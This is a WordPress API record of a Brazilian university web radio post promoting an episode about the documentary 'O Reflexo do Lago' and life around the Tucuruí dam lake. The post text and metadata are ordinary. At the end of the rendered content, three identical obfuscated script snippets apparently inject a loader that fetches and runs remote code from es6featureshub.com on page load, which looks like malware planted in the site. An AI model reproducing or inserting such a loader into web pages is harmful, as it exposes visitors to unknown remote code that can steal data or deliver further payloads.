{"id":7869,"date":"2020-12-26T08:00:45","date_gmt":"2020-12-26T10:00:45","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=7869"},"modified":"2025-10-21T11:39:52","modified_gmt":"2025-10-21T14:39:52","slug":"o-reflexo-do-lago","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/","title":{"rendered":"O Reflexo do Lago"},"content":{"rendered":"<!--[if lt IE 9]><script>document.createElement('audio');<\/script><![endif]-->\n\t<div class=\"wp-playlist wp-audio-playlist wp-playlist-light\">\n\t\t\t<div class=\"wp-playlist-current-item\"><\/div>\n\t\t<audio controls=\"controls\" preload=\"none\" width=\"1178\"\n\t\t\t><\/audio>\n\t<div class=\"wp-playlist-next\"><\/div>\n\t<div class=\"wp-playlist-prev\"><\/div>\n\t<noscript>\n\t<ol>\n\t\t<li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2020-2\/ESCURINHO%20DO%20CINEMA%20-%20O%20REFLEXO%20DO%20LAGO%20-%2026.12.2020.mp3'>Escurinho do Cinema - O Reflexo do Lago<\/a><\/li>\t<\/ol>\n\t<\/noscript>\n\t<script type=\"application\/json\" class=\"wp-playlist-script\">{\"type\":\"audio\",\"tracklist\":true,\"tracknumbers\":true,\"images\":true,\"artists\":true,\"tracks\":[{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2020-2\\\/ESCURINHO DO CINEMA - O REFLEXO DO LAGO - 26.12.2020.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"Escurinho do Cinema - O Reflexo do Lago\",\"caption\":\"\",\"description\":\"\\\"ESCURINHO DO CINEMA - O REFLEXO DO LAGO - 26.12.2020\\\". Genre: Other.\",\"meta\":{\"artist\":\"R\\u00e1dio Web UFPA\",\"album\":\"Escurinho do Cinema\",\"genre\":\"Other\",\"length_formatted\":\"36:00\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}}]}<\/script>\n<\/div>\n\t\n<p>Nesta edi\u00e7\u00e3o do Escurinho do Cinema, o destaque \u00e9 o longa-metragem <strong>O Reflexo do Lago<\/strong>, do jornalista e cineasta paraense Fernando Segtowick.<\/p>\n<p>A obra \u00e9 um document\u00e1rio inspirado no livro &#8220;O Lago do Esquecimento&#8221;, da fot\u00f3grafa Paula Sampaio, que retrata a vida de pessoas que moram aos arredores do grande lago que surgiu como consequ\u00eancia da constru\u00e7\u00e3o da hidrel\u00e9trica de Tucuru\u00ed. O filme conta com narrativas dos moradores que relatam sobre sua rela\u00e7\u00e3o com o ambiente e a vida na regi\u00e3o.<\/p>\n<p>Ao pensar em produzir para o audiovisual, Fernando Segtowick fala como tomou a decis\u00e3o de trabalhar com a tem\u00e1tica. O filme mostra a contradit\u00f3ria e dif\u00edcil realidade das pessoas que vivem ali, onde foi instalada a segunda maior usina hidrel\u00e9trica do pa\u00eds, mas que gerou enormes impactos na vida da popula\u00e7\u00e3o local que, muitas vezes, n\u00e3o t\u00eam nem energia el\u00e9trica em casa. O document\u00e1rio <strong>O Reflexo do Lago<\/strong> foi selecionado para o 70\u00ba Festival Internacional de Berlim, um dos festivais de cinema mais prestigiados do mundo.<\/p>\n<p>Durante o programa, o cineasta fala ainda sobre as dificuldades de se produzir e consumir cinema no Brasil. Ele relata como a pol\u00edtica de desmonte do meio audiovisual pelo governo atual e o costume nacional de absorver os produtos norte-americanos s\u00e3o quest\u00f5es relevantes, que tamb\u00e9m \u00e9 afetado pela organiza\u00e7\u00e3o do setor. &#8220;\u00c9 uma quest\u00e3o muito estrutural que n\u00e3o \u00e9 culpa do p\u00fablico, mas da maneira como a pr\u00f3pria distribui\u00e7\u00e3o est\u00e1 organizada no Brasil&#8221;, diz Segtowick.<\/p>\n<p>Para saber mais sobre o filme <strong>O Reflexo do Lago<\/strong>, n\u00e3o perca esta edi\u00e7\u00e3o do Escurinho do Cinema!<\/p>\n<p>Apresenta\u00e7\u00e3o: Elissandra Batista<br \/>\nProdu\u00e7\u00e3o e roteiro: Ana Rosa Batista<br \/>\nGrava\u00e7\u00e3o e montagem: Felipe Rocha<br \/>\nSupervis\u00e3o e edi\u00e7\u00e3o: Elissandra Batista e Fabr\u00edcio Queiroz<\/p>\n<p>O Escurinho do Cinema vai ao ar no s\u00e1bado, \u00e0s 17h; no domingo, \u00e0s 15h; e na ter\u00e7a-feira, \u00e0s 19h.<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/l281Jxp_-nI\" width=\"600\" height=\"400\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"O Reflexo do Lago\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/\" aria-label=\"Read more about O Reflexo do Lago\">Ler mais<\/a><\/p>\n","protected":false},"author":2,"featured_media":7872,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[677],"tags":[],"class_list":["post-7869","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-escurinho-do-cinema"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>O Reflexo do Lago - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Conhe\u00e7a mais sobre o doc O Reflexo do Lago, longa-metragem que aborda a realidade da popula\u00e7\u00e3o que vive no entorno do lago da hidrel\u00e9trica de Tucuru\u00ed\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"O Reflexo do Lago - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Conhe\u00e7a mais sobre o doc O Reflexo do Lago, longa-metragem que aborda a realidade da popula\u00e7\u00e3o que vive no entorno do lago da hidrel\u00e9trica de Tucuru\u00ed\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2020-12-26T10:00:45+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T14:39:52+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/O-Reflexo-do-Lago.jpg?fit=1086%2C652&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1086\" \/>\n\t<meta property=\"og:image:height\" content=\"652\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Fabr\u00edcio Queiroz\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fabr\u00edcio Queiroz\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/\"},\"author\":{\"name\":\"Fabr\u00edcio Queiroz\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\"},\"headline\":\"O Reflexo do Lago\",\"datePublished\":\"2020-12-26T10:00:45+00:00\",\"dateModified\":\"2025-10-21T14:39:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/\"},\"wordCount\":341,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/O-Reflexo-do-Lago.jpg?fit=1086%2C652&ssl=1\",\"articleSection\":[\"Escurinho do Cinema\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/\",\"name\":\"O Reflexo do Lago - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/O-Reflexo-do-Lago.jpg?fit=1086%2C652&ssl=1\",\"datePublished\":\"2020-12-26T10:00:45+00:00\",\"dateModified\":\"2025-10-21T14:39:52+00:00\",\"description\":\"Conhe\u00e7a mais sobre o doc O Reflexo do Lago, longa-metragem que aborda a realidade da popula\u00e7\u00e3o que vive no entorno do lago da hidrel\u00e9trica de Tucuru\u00ed\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/O-Reflexo-do-Lago.jpg?fit=1086%2C652&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/O-Reflexo-do-Lago.jpg?fit=1086%2C652&ssl=1\",\"width\":1086,\"height\":652},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"O Reflexo do Lago\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\",\"name\":\"Fabr\u00edcio Queiroz\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"caption\":\"Fabr\u00edcio Queiroz\"},\"description\":\"Editor e Jornalista respons\u00e1vel\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"O Reflexo do Lago - Radio Web UFPA","description":"Conhe\u00e7a mais sobre o doc O Reflexo do Lago, longa-metragem que aborda a realidade da popula\u00e7\u00e3o que vive no entorno do lago da hidrel\u00e9trica de Tucuru\u00ed","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/","og_locale":"pt_BR","og_type":"article","og_title":"O Reflexo do Lago - Radio Web UFPA","og_description":"Conhe\u00e7a mais sobre o doc O Reflexo do Lago, longa-metragem que aborda a realidade da popula\u00e7\u00e3o que vive no entorno do lago da hidrel\u00e9trica de Tucuru\u00ed","og_url":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2020-12-26T10:00:45+00:00","article_modified_time":"2025-10-21T14:39:52+00:00","og_image":[{"width":1086,"height":652,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/O-Reflexo-do-Lago.jpg?fit=1086%2C652&ssl=1","type":"image\/jpeg"}],"author":"Fabr\u00edcio Queiroz","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Fabr\u00edcio Queiroz","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/"},"author":{"name":"Fabr\u00edcio Queiroz","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096"},"headline":"O Reflexo do Lago","datePublished":"2020-12-26T10:00:45+00:00","dateModified":"2025-10-21T14:39:52+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/"},"wordCount":341,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/O-Reflexo-do-Lago.jpg?fit=1086%2C652&ssl=1","articleSection":["Escurinho do Cinema"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/","url":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/","name":"O Reflexo do Lago - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/O-Reflexo-do-Lago.jpg?fit=1086%2C652&ssl=1","datePublished":"2020-12-26T10:00:45+00:00","dateModified":"2025-10-21T14:39:52+00:00","description":"Conhe\u00e7a mais sobre o doc O Reflexo do Lago, longa-metragem que aborda a realidade da popula\u00e7\u00e3o que vive no entorno do lago da hidrel\u00e9trica de Tucuru\u00ed","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/O-Reflexo-do-Lago.jpg?fit=1086%2C652&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/O-Reflexo-do-Lago.jpg?fit=1086%2C652&ssl=1","width":1086,"height":652},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/escurinho-do-cinema\/o-reflexo-do-lago\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"O Reflexo do Lago"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096","name":"Fabr\u00edcio Queiroz","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","caption":"Fabr\u00edcio Queiroz"},"description":"Editor e Jornalista respons\u00e1vel","url":"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/O-Reflexo-do-Lago.jpg?fit=1086%2C652&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-22V","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7869","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=7869"}],"version-history":[{"count":4,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7869\/revisions"}],"predecessor-version":[{"id":17603,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7869\/revisions\/17603"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/7872"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=7869"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=7869"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=7869"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}